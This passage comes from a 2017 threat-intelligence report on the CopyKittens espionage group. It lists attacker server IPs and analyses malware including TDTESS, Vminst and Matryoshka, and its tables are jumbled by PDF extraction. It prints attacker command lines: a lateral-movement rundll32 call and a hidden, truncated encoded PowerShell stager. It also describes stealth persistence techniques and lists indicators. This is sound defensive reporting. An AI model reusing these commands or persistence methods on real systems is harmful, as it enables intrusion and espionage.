NA 

NA 

NA 

United States 

United States 

United States 

209.51.199.116  Metasploit and web hacking 

United States 

eNET Inc. 

eNET Inc. 

eNET Inc. 

eNET Inc. 

eNET Inc. 

eNET Inc. 

eNET Inc. 

38.130.75.20 

185.92.73.194 

NA 

NA 

146.0.73.109 

Cobalt Strike 

146.0.73.110 

NA 

United States 

Foxcloud Llp 

United States 

Foxcloud Llp 

Netherlands 

Netherlands 

Hostkey B.v. 

Hostkey B.v. 

Hostkey B.v. 

Hostkey B.v. 

Hostkey B.v. 

146.0.73.111 

Metasploit and web hacking 

Netherlands 

146.0.73.112 

Cobalt Strike 

146.0.73.114 

Cobalt Strike 

Netherlands 

Netherlands 

144.168.45.126 

BEEF SSL Server 

United States 

Incero LLC 

217.12.201.240 

Cobalt Strike 

217.12.218.242 

Cobalt Strike 

5.34.180.252 

Cobalt Strike 

5.34.181.13 

Cobalt Strike 

Netherlands 

Netherlands 

Netherlands 

Netherlands 

ITL Company 

ITL Company 

ITL Company 

ITL Company 

188.120.224.198  Cobalt Strike 

Russian Federation 

JSC ISPsystem 

188.120.228.172  NA 

Russian Federation 

JSC ISPsystem 

188.120.242.93 

Cobalt Strike 

Russian Federation 

JSC ISPsystem 

188.120.243.11 

NA 

Russian Federation 

JSC ISPsystem 

188.120.247.151 

TDTESS 

Russian Federation 

JSC ISPsystem 

62.109.2.52 

Cobalt Strike 

Russian Federation 

JSC ISPsystem 

188.120.232.157  Cobalt Strike 

Russian Federation 

JSC ISPsystem 

185.118.65.230 

185.118.66.114 

NA 

NA 

Russian Federation 

LLC CloudSol 

Russian Federation 

LLC CloudSol 

141.105.67.58 

Metasploit and web hacking 

Russian Federation  Mir Telematiki Ltd 

141.105.68.25 

Cobalt Strike 

Russian Federation  Mir Telematiki Ltd 

141.105.68.26 

Metasploit and web hacking 

Russian Federation  Mir Telematiki Ltd 

141.105.68.29 

Metasploit and web hacking 

Russian Federation  Mir Telematiki Ltd 

141.105.69.69 

Cobalt Strike 

Russian Federation  Mir Telematiki Ltd 

141.105.69.70 

matreyoshka 

Russian Federation  Mir Telematiki Ltd 

141.105.69.77 

Metasploit and web hacking 

Russian Federation  Mir Telematiki Ltd 

                                                           

36 Some have been reported in our previous public reports 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 24 of 48 

ASN 

AS20473 

AS20473 

AS20473 

AS10297 

AS10297 

AS10297 

AS10297 

AS10297 

AS10297 

AS10297 

AS200904 

AS200904 

AS57043 

AS57043 

AS57043 

AS57043 

AS57043 

AS54540 

AS21100 

AS21100 

AS21100 

AS21100 

AS29182 

AS29182 

AS29182 

AS29182 

AS29182 

AS29182 

AS29182 

AS59504 

AS59504 

AS49335 

AS49335 

AS49335 

AS49335 

AS49335 

AS49335 

AS49335 

 

IP 

Use 

Country 

AS name 

31.192.105.16 

Cobalt Strike 

Russian Federation  Mir Telematiki Ltd 

31.192.105.17 

Metasploit and web hacking 

Russian Federation  Mir Telematiki Ltd 

31.192.105.28 

Cobalt Strike 

Russian Federation  Mir Telematiki Ltd 

158.69.150.163 

Cobalt Strike 

176.31.18.29 

Cobalt Strike 

188.165.69.39 

Cobalt Strike 

192.99.242.212 

Cobalt Strike 

198.50.214.62 

Cobalt Strike 

51.254.76.54 

Cobalt Strike 

Canada 

France 

France 

Canada 

Canada 

France 

OVH SAS 

OVH SAS 

OVH SAS 

OVH SAS 

OVH SAS 

OVH SAS 

198.55.107.164 

NA 

United States 

QuadraNet  Inc 

104.200.128.126  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.161  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.173  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.183  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.184  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.185  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.187  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.195  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.196  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.198  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.205  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.206  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.208  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.209  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.48 

Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.58 

Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.64 

Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

104.200.128.71 

Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

ASN 

AS49335 

AS49335 

AS49335 

AS16276 

AS16276 

AS16276 

AS16276 

AS16276 

AS16276 

AS8100 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

107.181.160.138  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

AS46562 

107.181.160.178  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.160.194  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.160.195  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.161.141  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.174.21 

Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.174.228  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.174.232  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

107.181.174.241  Cobalt Strike 

United States 

Total Server Solutions L.L.C. 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS46562 

AS49981 

AS49981 

86.105.18.5 

Cobalt Strike 

93.190.138.137 

NA 

212.199.61.51 

Cobalt Strike 

80.179.42.37 

80.179.42.44 

NA 

NA 

Netherlands 

Netherlands 

WorldStream B.V. 

WorldStream B.V. 

Israel 

Israel 

Israel 

012 Smile Communications LTD. 

AS9116 

012 Smile Communications LTD. 

AS9116 

012 Smile Communications LTD. 

AS9116 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 25 of 48 

 

Recently the attackers implemented self-signed certificates in some of the severs they manage, impersonating 
Microsoft and Google.37 

Self-signed digital certificate impersonating Microsoft as captured by censys.io 

 
 

 

 

 

                                                           

37 https://censys.io/certificates/f4aaac7d6aafc426d1adbe3b845a26c4110f7c9e54145444a8668718b84cbdb0  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 26 of 48 

 

Malware 

In this chapter we analyze and review malware used by CopyKittens. 

TDTESS Backdoor 

TDTESS  (22fd59c534b9b8f5cd69e967cc51de098627b582)  is  64-bit  .NET  binary  backdoor  that  provides  a 
reverse shell with an option to download and execute files. It routinely calls in to the command and control 
server  for  new  instructions  using  basic  authentication.  Commands  are  sent  via  a  web  page.  The  malware 
creates a stealth service, which will not show on the service manager or other tools that enumerate services 
from WINAPI or Windows Management Instrumentation.  

Installation and removal 

TDTESS  can  run  as  either  an  interactive  or  non-interactive  (service)  program.  When  called  interactively,  it 
receives one of the two arguments: installtheservice to install itself or uninstalltheservice to remove itself. The 
arguments are described below: 

installtheservice  

If running with administrator privileges, it will install a service with the following characteristics: 

Key name: bmwappushservice 
Display name: bmwappushsvc 
Description: WAP Push Message Routing Service 
Type: own (runs in its own process) 
Start  type:  auto  (starts  each  time  the  computer  is  restarted  and  runs  even  if  no  one  logs  on  to  the 
computer) 
Path: <main executable path> (In our analysis: c:\Users\PC008\Desktop\t.exe) 
Security descriptor: 
D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLC
SWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;F
A;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) 

Service information from command-line using sc tool 

 

The hardcoded security descriptor used to create the service is a persistence technique. Interactive users, even 
if they are administrators, cannot stop or even see the service in services.msc snap-in.  

  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 27 of 48 

 

Following is a list of denied commands: 

service_change_config 
service_query_status 
service_stop 
service_pause_continue 
delete 

Service information in Registry 

 

Two  log  files  are  created  during  the  service  installation,  but  deleted  by  the  program.  Following  is  their 
recovered content: 

InstallUtil.InstallLog 

<filename>.t.InstallLog 

 

After creating the service, it will update the file creation time to that of the following file: 

%windir%\system32\svchost.exe 

  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 28 of 48 

 

uninstalltheservice 

If running with administrator privileges, it will uninstall the said service, create log files and then deletes them. 

InstallUtil.InstallLog 

<filename>.t.InstallLog 

 

Because the  service installing mechanism appears to be  default for .NET  programs,  the creator of the tool 
deletes the log files right after they are created. 

If no argument is given when called interactively, the program terminates itself. 

Functionality 

The  service  is  started  immediately  after  installation.  After  five  minutes,  it  verifies  internet  connectivity  by 
making a HTTP HEAD request to microsoft.com. 

Then it tries to access the C&C servers looking for commands. 

Hardcoded HTTP parameters and URL 

  

 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 29 of 48 

 

As a reply, TDTESS expects one of the following Bas64 encoded commands: 

getnrun - download and execute a file. Parameters are drop, drop_path and t. 
runnreport - send information about the computer. Parameters are cmd and boss. 
wait - time to next interval to get data. 

Getnrun command and parameters 

 

Indicators of Compromise 

File name: 

tdtess.exe  

md5: 

113ca319e85778b62145019359380a08 

Services: 

bmwappushservice 

Registry Keys:  

 HKLM\System\CurrentControlSet\Services\bmwappushservice 

URLs: 

http://is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com/deploy/assets/css/main/style.min.css 
http://a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net/deploy/assets/css/main/style.min.css 

HTTP artifacts: 

"User-Agent : XXXXXXXXXXXXXXXXX/5.0 (Windows NT 6.1 WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 
"Proxy-Authorization : Basic [Data]" – [Data] Will contain the TDTESS encrypted data to send 

  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 30 of 48 

 

Vminst for Lateral Movement 

Vminst (a60a32f21ac1a2ec33135a650aa8dc71) is a lateral movement tool used to infect hosts in the network 
using previously stolen credentials. It Injects Cobalt Strike into memory of infected hosts.  

The  binary  implements  ServiceMain  and  is  intended  to  be  installed  as  a  service  named  “sdrsrv.”  When  it 
functions as a service, it injects Cobalt Strike beacon into its own process (which is 32-bit “svchost”) or creates 
a new 32-bit “rundll32” process and injects the beacon into the new process. The injection method depends 
on the parameter received when the service was created. 

It is configured to open a new “rundll32” process in suspend-mode and create a remote thread which executes 
a Cobalt Strike beacon or shellcode. 

The binary has the option to run and load itself in memory. It also has the option to be executed through its 
exported function "v," which gets a base64 string parameter built as follows: 

Base-64-Encode(“/mv /OptionalCommand”) 

OptionalCommand can be one of the following: 

•  help - prints usage instructions: 

[*] /help V160\n 
Get : Create Service and run beacon over self thread\n 
[*] /get ip (use current token)\n 
[*] /get ip domain user pass\n 
[*] /get ip user pass\n 
New : Create Service and run beacon over new rundll32.exe thread\n 
[*] /new ip (use current token)\n 
[*] /new ip domain user pass\n 
[*] /new ip user pass\n 
[*] /new ip user pass\n 
Del : Delete service and related dlls from remote host 
[*] /del ip domain user pass\n 
[*] /del ip user pass\n 
[*] /del ip\n 
Run : Run a new beacon !\n 
[*] /run [no arguments] 

•  del - stops and deletes the service “sdrsrv,” and deletes the following files: 

\\ [IP or computer name (Can be Localhost)]\C$\Users\public\vminst.tmp 
\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\vminst.tmp 
\\ [IP or computer name (Can be Localhost)]\C$\Windows\vminst.tmp 

• 

• 

• 

scan - sends “[ok]” to the parent of its parent process. 

info - sends “[ok]” to the parent of its parent process. 

run - injects a beacon into a new “rundll32” process. 

•  get - gets an IP address, installs and starts the “sdrsrv” service in the remote hosts. 

•  new - gets IP address, deletes the old vminst from install path, and installs the “sdrsrv” service in the 
remote  hosts.  Then,  starts  the  service  with  parameter  “NEW_THREAD”  that  runs  the  service.  This 
command is likely used for updating the implant. 

The attacker uses vminst.tmp to spread across the organization. Using the command “rundll32 vminst.tmp,v 
/mv /get ip-segment credentials” it enumerates the segments and tries to connect to the hosts through SMB 
(“GetFileAttributes” to network path), installing the “sdrsrv” service in each host it can access. 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 31 of 48 

 

Indicators of Compromise 

File name: 

vminst.tmp 

md5: 

A60A32F21AC1A2EC33135A650AA8DC71 

Services:  

sdrsrv 

Registry Keys: 

HKLM\System\CurrentControlSet\Services\sdrsrv 

Path: 

\\ [IP or computer name (Can be Localhost)]\C$\Users\public\[File] 
\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\[File] 
\\ [IP or computer name (Can be Localhost)]\C$\Windows\[File] 

File, one of: 

vminst.tmp - The malware 
l.tmp - Log file from last V command 

NetSrv – Cobalt Strike Loader 

NetSrv  (efca6664ad6d29d2df5aaecf99024892)  loads  Cobalt  Strike  beacons  and  shellcodes  in  infected 
computers. 

The binary implements ServiceMain, intended to be installed as a service named “netsrv.” When it functions 
as a service, it is configured to open a new “rundll32” process in suspend-mode and create a remote thread 
that executes a Cobalt Strike beacon or shellcode. 

The binary also has the option to be executed with parameters that determine what it will inject into the 
“rundll32” process. The command-line is as follows: 

netsrv.exe /managed /ModuleToInject 

The ModuleToInject can be one of these options: 

sbdns 
slbdnsk1 
slbdnsn1 
slbsbmn1 
slbsmbk1 

Each of these options injects a Cobalt Strike beacon or shellcode into the “rundll32” process. 

Indicators of Compromise 

File names:  

netsrv.exe 
netsrva.exe 
netsrvd.exe 
netsrvs.exe 

Services: 

netsrv 
netsrvs 
netsrvd 

Registry Keys: 

HKLM\System\CurrentControlSet\Services\netsrv 
HKLM\System\CurrentControlSet\Services\netsrvs 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 32 of 48 

 

HKLM\System\CurrentControlSet\Services\netsrvd 

Matryoshka v1 – RAT 

Matryoshka v1 is a RAT analyzed in the 2015 report by ClearSky and Minerva.38 It uses DNS for command and 
control  communication,  and  has  common  RAT  capabilities  such  as  stealing  Outlook  passwords,  screen 
grabbing, keylogging, collecting and uploading files, and giving the attacker Meterpreter shell access. We have 
seen this version of Matreyoshka in the wild from July 2016 until January 2017. 

 The Matryoshka.Reflective_Loader injects the module Matryoshka.Rat, which has the same persistence keys 
and communication method described in the original report.  

Indicators of Compromise 

File name 
Kernel.dll 
win.dll 
update5x.dll  
22092014_ver621.dll 

Md5 
94ba33696cd6ffd6335948a752ec9c19 
d9aa197ca2f01a66df248c7a8b582c40 
506415ef517b4b1f7679b3664ad399e1 
1ca03f92f71d5ecb5dbf71b14d48495c 

Command and control 
cloudflare-statics[.]com 
cloudflare-analyse[.]com 
mswordupdate17[.]com 
 

Registry Keys: 

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\{0355F5D0-467C-30E9-894C-
C2FAEF522A13} 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{0355F5D0-467C-30E9-894C-C2FAEF522A13} 

Scheduled Tasks: 

\Windows\Microsoft Boost Kernel Optimization 
Windows Boost Kernel 

Matreyoshka v2 – RAT 

Matryoshka v2  (bd38cab32b3b8b64e5d5d3df36f7c55a)  is  mostly  like  Matreyoshka  v1  but  has  fewer 
commands  and  a  few  other  minor  changes.  Upon  starting  it  will  inject  the  communication  module 
to all available processes (with the same run architecture and the same or lower level of permission).  

The inner name of Svchost’s is Injector.dll. The next stage, in memory, is ReflectiveDLL.dll. The ReflectiveDLL.dll 
provides persistence via a schedule task and checks that the stager, Injector.dll, exist on disk. 

ReflectiveDLL.dll gets commands via the following DNS resolutions: 

Command 

Resolved IP 

Send full info 

104.40.211.100 

Beacon 
MessageBox 

104.40.211.11 
104.40.211.12 

Get UID 

104.40.211.13 

Functionality 
Send host information 

Inject Cobalt Strike beacon 
Pop MessageBox with simple note (Only if injected into process with user 
interface) 
Send UID 

Exit 

104.40.211.14 

Exit the process the thread was injected into 

OK_StopParse 

161.69.29.251 

keep-alive or end chain of commands 

 

  

                                                           

38  www.clearskysec.com/report-the-copykittens-are-targeting-israelis/  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 33 of 48 

 

Indicators of Compromise 

File names: 

Svchost32.swp  
Svchost64.swp 

Md5: 

bd38cab32b3b8b64e5d5d3df36f7c55a 

Folder path: 

[windrive]\Users\public\ 
[windrive]\Windows\temp\ 
[windrive]\Windows\tmp\ 

Files: 

LogManager.tmp 
edg1CF5.tmp  (malware backup copy) 
ntuser.swp     (malware backup copy) 
svchost64.swp (malware main file) 
ntuser.dat.swp (log file) 
455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction (folder) 
_%d.klg (keylog file, random integer) 
_%d.sc  (screen capture file, random integer) 

Command and control: 

winupdate64[.]com 

Services: 

sdrsrv 

Class from CPP RTTI: 

PSCL_CLASS_JOB_SAVE_CONFIG 
PSCL_CLASS_BASE_JOB 

  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 34 of 48 

 

ZPP – File Compressor  

ZPP  (bcae706c00e07936fc41ac47d671fc40)  is  a  .NET  console  program  that  compresses  files  with  the  ZIP 
algorithm. It can transfer compressed files to a remote network share. 

Command line options are as follows: 

-I - File extension to compress (i.e.: .txt) 
-s - Source directory 
-d - Destination directory 
-gt - Greater than creation timestamp 
-lt  - Lower than creation timestamp 
-mb  - Unimplemented 
-o  - Output file name 
-e - File extension to skip (except) 

ZPP  

 

ZPP will recursively read all files in the source directory to compress them with the maximum compression 
rate if their names match the extension pattern given (-i). The compressed ZIP file is written to the output 
directory (-d). If no output file name is set, ZPP will use the mask zpp<random_number>.out. <file_number>.  

For example: 

The file compilation timestamp is Tue, 05 Jul 2016 17:22:59 UTC. 

Filename is zpp5077.out0  

ad09feb76709b825569d9c263dfdaaac is a previous version (compilation timestamp: Sat, 09 Jan 2016 17:02:38 
UTC) and is only different in that it accepts the –e switch, which ignored by the program logic. 

214be584ff88fb9c44676c1d3afd7c95  is  the  newest  version  (compilation  timestamp:  Mon,  26  Sep  2016 
19:49:34 UTC). It is supposed to implement the –s switch but although it is set when the user gives it to the 
program, the switch is ignored by the code. 

 

ZPP seems to be under development. All versions have bugs. 

ZPP version 2.0 

 

It  uses  the  reduced  version  of  DotNetZip 
(7c359500407dd393a276010ab778d5af) to be under the same directory or %PATH%. 

library. 39  Therefore, 

it  requires 

Ionic.Zip.Reduced.dll 

Function doCompressInNetWorkDirectory() is intended to exfiltrate date from a target machine to a network 
share. 

                                                           

39 https://dotnetzip.codeplex.com 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 35 of 48 

 

Passing it a network location will result in the compressed files being dropped in it: 

ZPP doCompressInNetWorkDirectory() function 

Passing a network location to ZPP 

 

Indicators of Compromise 

File name: 

zpp.exe  

md5: 

bcae706c00e07936fc41ac47d671fc40 
ad09feb76709b825569d9c263dfdaaac 
214be584ff88fb9c44676c1d3afd7c95 

Cobalt Strike 

Cobalt  Strike  is  a  publicly  available  commercial  software  for  "Adversary  Simulations  and  Red  Team 
Operations."40 While not malicious in and of itself, it is often used by cybercrime groups and state-sponsored 
threat groups, due to its post-exploitation and covert communication capabilities. 41 4243 44 

CopyKittens use the free 21-day trial version of Cobalt Strike. Thus, malicious communication generated by 
the tool is much easier to detect, because a special header is sent in each HTTP GET transaction. The special 
header is "X-Malware," i.e. there is a literal indication that "this network communication is malicious." All that 

                                                           

40  https://www.cobaltstrike.com  
41 https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html  
42 https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks  
43 
oceanlotus-group/  
44 
CHINAS-GOVERNMENT-AGENCY-.pdf  

https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-

http://www.antiy.net/wp-content/uploads/ANALYSIS-ON-APT-TO-BE-ATTACK-THAT-FOCUSING-ON-

 

 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 36 of 48 

 

defender  need  to  do  to  detect  infections  is  to  look  for  this  header  in  network  traffic.  Other  "tells"  are 
implemented in the trail version.45 

CopyKittens often use Cobalt Strike's DNS based command and control capability.46 Other capabilities include 
PowerShell scripts execution, keystrokes logging, taking screenshots, file downloads, spawning other payloads, 
and peer-to-peer communication over the SMB. 

Persistency 

The attackers used a novel way for persistency of Cobalt Strike samples in certain machine – a scheduled task 
was written directly to the registry.  

The malware  creates  a  PowerShell  wrapper,  which executes  powershell.exe  to run  scripts.  The  wrapper  is 
copied to %windir% with one of the following names: 

svchost.exe 
csrss.exe 
notpad.exe (note missing e) 
conhost.exe 

The scheduled tasks are saved in the following registry path: 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks 

With the following attributes: 

"Path"="\\Microsoft\\Windows\\Media Center\\ConfigureLocalTimeService" 
"Description"="Media Center Time Update From Computer Local Time." 
"Actions"=hex:01,00,66,66,00,00,00,00,2c,00,00,00,43,00,3a,00,5c,00,57,00,69,\ 
00,6e,00,64,00,6f,00,77,00,73,00,5c,00,73,00,76,00,63,00,68,00,6f,00,73,00,\ 
74,00,2e,00,65,00,78,00,65,00,7e,31,00,00,2d,00,6e,00,6f,00,70,00,20,00,2d,\ 
00,77,00,20,00,68,00,69,00,64,00,64,00,65,00,6e,00,20,00,2d,00,65,00,6e,00,\ 
63,00,6f,00,64,00,65,00,64,00,63,00,6f,00,6d,00,6d,00,61,00,6e,00,64,00,20,\ 
00,4a,00,41,00,42,00,7a,00,41,00,44,00,30,00,41,00,54,00,67,00,42,00,6c,00,\ 
[…] 

The hex code in the Actions attribute is converted into the following command line action: 

C:\Windows\svchost.exe -nop -w hidden -encodedcommand JABzAD0ATgBl[…] 

The executed command is a base64 encoded PowerShell cobalt strike stager. 

The  task  does  not  have  a  name  attribute  and  it  does  not  appear  in  windows  scheduled  task  viewers.  The 
installation methods of this persistency method is unknown to us. 

Metasploit 

A well-known free and open source framework for developing and executing exploit code against a remote 
target machine.47 It has more than 1,610 exploits, as well as more than 438 payloads, which include command 
shell that enables users to run collection scripts or arbitrary commands against the host. Meterpreter, which 
enables users to control the screen of a device using VNC and to browse, upload and download files. It also 
employs dynamic payloads that enables users to evade antivirus defenses by generating unique payloads.48  

                                                           

45 https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/  
46 https://www.cobaltstrike.com/help-dns-beacon  
47 https://www.metasploit.com   
48 https://en.wikipedia.org/wiki/Metasploit_Project  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 37 of 48 

 

Empire Post-exploitation Framework 

In several occasions  the  attackers used  Empire, a free  and open source  "post-exploitation framework that 
includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.49 The framework 
offers  cryptologically-secure  communications  and  a  flexible  architecture.  On  the  PowerShell  side,  Empire 
implements the  ability to run PowerShell agents  without  needing powershell.exe, rapidly  deployable post-
exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network 
detection, all wrapped up in a usability-focused framework." 

                                                           

49 https://github.com/EmpireProject/Empire  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 38 of 48 

 

Detection name 
Detection name 
Detection name 
Detection name 
Detection name 
Detection name 
Detection name 
Detection name 
Detection name 
URL 
URL 
URL 
URL 
URL 
URL 
URL 

URL 
URL 

URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
URL 
SSLCertificate 
SSLCertificate 
SSLCertificate 
SSLCertificate 
SSLCertificate 
SSLCertificate 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 

 

 

Indicators of Compromise 

BKDR_COBEACON.A 
TROJ_POWPICK.A 
HKTL_PASSDUMP 
TROJ_SODREVR.A 
TROJ_POWSHELL.C 
BKDR_CONBEA.A 
TSPY64_REKOTIB.A 
HKTL_DIRZIP 
TROJ_WAPPOME.A 
http://js[.]jguery[.]net/main[.]js  
http://pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online/winini[.]exe 
http://38[.]130[.]75[.]20/check[.]html 
http://update[.]microsoft-office[.]solutions/license[.]doc 
http://update[.]microsoft-office[.]solutions/error[.]html 
http://main[.]windowskernel14[.]com/spl/update5x[.]zip 
http://img[.]twiter-
statics[.]info/i/658A6D6AE42A658A6D6AE42A/0de9c5c6599fdf5201599ff9b30e0000/6E24E58CF
C94/icon[.]png 
http://files0[.]terendmicro[.]com/ 
http://ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-goverment-
techcenter[.]tech/%D7%A1%D7%A7%D7%A8%20%D7%A9%D7%A0%D7%AA%D7%99[.]docx 
http://ea-in-f155[.]1e100[.]microsoft-security[.]host/ 
https://ea-in-f155[.]1e100[.]microsoft-security[.]host/mTQJ 
http://iba[.]stage[.]7338879[.]i[.]gtld-servers[.]services 
http://doa[.]stage[.]7338879[.]i[.]gtld-servers[.]services 
http://fda[.]stage[.]7338879[.]i[.]gtld-servers[.]services 
http://rqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services 
http://qqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services 
http://api[.]02ac36110[.]49318[.]a[.]gtld-servers[.]zone 
s1w-amazonaws.office-msupdate[.]solutions 
a104-93-82-25.mandalasanati[.]info/iBpa 
http://fetchnews-agency[.]news-bbc.press/pictures.html 
http://fetchnews-agency.news-bbc.press/omnews.doc 
http://fetchnews-agency[.]news-bbc.press/en/20170/pictures.doc 
fa3d5d670dc1d153b999c3aec7b1d815cc33c4dc 
b11aa089879cd7d4503285fa8623ec237a317aee 
07317545c8d6fc9beedd3dd695ba79dd3818b941 
3c0ecb46d65dd57c33df5f6547f8fffb3e15722d 
1c43ed17acc07680924f2ec476d281c8c5fd6b4a 
8968f439ef26f3fcded4387a67ea5f56ce24a003 
206.221.181.253 
66.55.152.164 
68.232.180.122 
173.244.173.11 
173.244.173.12 
173.244.173.13 
209.190.20.149 
209.190.20.59 
209.190.20.62 
209.51.199.116 
38.130.75.20 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 39 of 48 

 

IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 

 

 

185.92.73.194 
144.168.45.126 
198.55.107.164 
104.200.128.126 
104.200.128.161 
104.200.128.173 
104.200.128.183 
104.200.128.184 
104.200.128.185 
104.200.128.187 
104.200.128.195 
104.200.128.196 
104.200.128.198 
104.200.128.205 
104.200.128.206 
104.200.128.208 
104.200.128.209 
104.200.128.48 
104.200.128.58 
104.200.128.64 
104.200.128.71 
107.181.160.138 
107.181.160.178 
107.181.160.194 
107.181.160.195 
107.181.161.141 
107.181.174.21 
107.181.174.228 
107.181.174.232 
107.181.174.241 
188.120.224.198 
188.120.228.172 
188.120.242.93 
188.120.243.11 
188.120.247.151 
62.109.2.52 
188.120.232.157 
185.118.65.230 
185.118.66.114 
141.105.67.58 
141.105.68.25 
141.105.68.26 
141.105.68.29 
141.105.69.69 
141.105.69.70 
141.105.69.77 
31.192.105.16 
31.192.105.17 
31.192.105.28 
146.0.73.109 
146.0.73.110 
146.0.73.111 
146.0.73.112 
146.0.73.114 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 40 of 48 

 

IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
IPv4Address 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 

 

 

217.12.201.240 
217.12.218.242 
5.34.180.252 
5.34.181.13 
86.105.18.5 
93.190.138.137 
212.199.61.51 
